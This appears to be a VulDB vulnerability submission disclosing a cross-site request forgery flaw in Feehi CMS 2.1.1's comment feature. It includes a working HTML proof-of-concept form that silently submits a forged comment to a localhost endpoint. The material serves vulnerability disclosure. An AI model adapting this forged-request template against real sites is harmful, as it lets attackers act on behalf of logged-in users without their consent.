Soumettre #52189: Feehi Cms 2.1.1 Csrf Vulnerability Exploitinformation

TitreFeehi Cms 2.1.1 Csrf Vulnerability Exploit
Description# Google Dork: [not applicable] # Date: 14082022 # Exploit Author: haruntamokur # Vendor Homepage: https://feehi.com/ # Software Link: https://github.com/liufee/cms # Version: 2.1.1 (REQUIRED) # Tested on: Windows 10 # CVE : [not applicable] When you log in application with user and password, you reach “Post my comment” tab. The function has Csrf exploit. If you write exploit code like following, you can exploit this vulnerability. URL: http://localhost:8080/index.php?r=article%2Fview&id=22#comment-7 Exploit Code <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost:8080/index.php?r=article%2Fcomment" method="POST"> <input type="hidden" name="&#95;csrf" value="5EgNi95Un03ZlbGkl3dj2u&#95;lxkDWSlBLz0h4q&#95;&#95;4to&#45;rMUHNl2bxCJ2h4calBlacv7&#95;2NqAdJBmpDxKYmsmCuA&#61;&#61;" /> <input type="hidden" name="Comment&#91;aid&#93;" value="22" /> <input type="hidden" name="Comment&#91;content&#93;" value="CSRFTest" /> <input type="hidden" name="comment&#95;post&#95;ID" value="114" /> <input type="hidden" name="Comment&#91;reply&#95;to&#93;" value="0" /> <input type="hidden" name="akismet&#95;comment&#95;nonce" value="32920dc775" /> <input type="hidden" name="ak&#95;js" value="101" /> <input type="hidden" name="comment&#95;mail&#95;notify" value="comment&#95;mail&#95;notify" /> <input type="hidden" name="Comment&#91;nickname&#93;" value="harun" /> <input type="hidden" name="Comment&#91;email&#93;" value="" /> <input type="hidden" name="Comment&#91;website&#95;url&#93;" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Utilisateur
 harun.tamokur (UID 35839)
Soumission15/11/2022 11:45 (il y a 4 ans)
Modérer16/11/2022 08:53 (21 hours later)
StatutAccepté
Entrée VulDB213788 [FeehiCMS Post My Comment Tab cross site request forgery]
Points17

Want to know what is going to be exploited?

We predict KEV entries!